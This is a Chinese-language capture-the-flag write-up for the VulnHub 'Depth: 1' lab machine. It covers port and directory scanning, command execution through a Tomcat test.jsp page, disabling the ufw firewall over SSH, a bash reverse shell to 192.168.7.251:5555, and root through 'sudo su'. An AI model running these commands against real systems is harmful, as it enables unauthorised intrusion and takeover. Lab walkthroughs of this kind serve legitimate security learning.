靶机地址:Depth: 1 ~ VulnHub
查看靶机的MAC地址:
一、信息收集
扫描目标主机
arp-scan -l
使用nmap扫描靶机开放的端口
nmap -sV -p- 192.168.7.132
浏览器访问8080端口,发现这是一个tomcat网页
翻译为:
使用dirsearch扫描目录
dirsearch -u http://192.168.7.132:8080/
拼接/test.jsp
翻译为:
经提示,尝试输入ls -l /tmp,查询成功
尝试直接反弹shell,失败😭
查看家目录ls -l /home,发现bill用户
输入ps -aux查看进程,发现sshd服务正在运行,但刚才扫描端口时却只有8080端口开放,只是就会猜测,它可能被防火墙拦截了
查看/etc目录ls -l /etc/,正如所猜测的那样,存在防火墙ufw
尝试关闭防火墙
ssh bill@localhost sudo ufw disable
使用 bash 反向 shell 在端口 192.168.7.251 的端口 5555 上获得访问权限
复制生成的有效负载并使用 ssh 去执行反弹。
二、Getshell
尝试反弹shell并进行监听
nc -lnvp 5555
ssh bill@localhost bash -i >& /dev/tcp/192.168.7.251/5555 0>&1
三、权限提升
sudo -l #查看sudo提权可用的命令
sudo su
提权成功!
成功找到flag{WellThatWasEasy}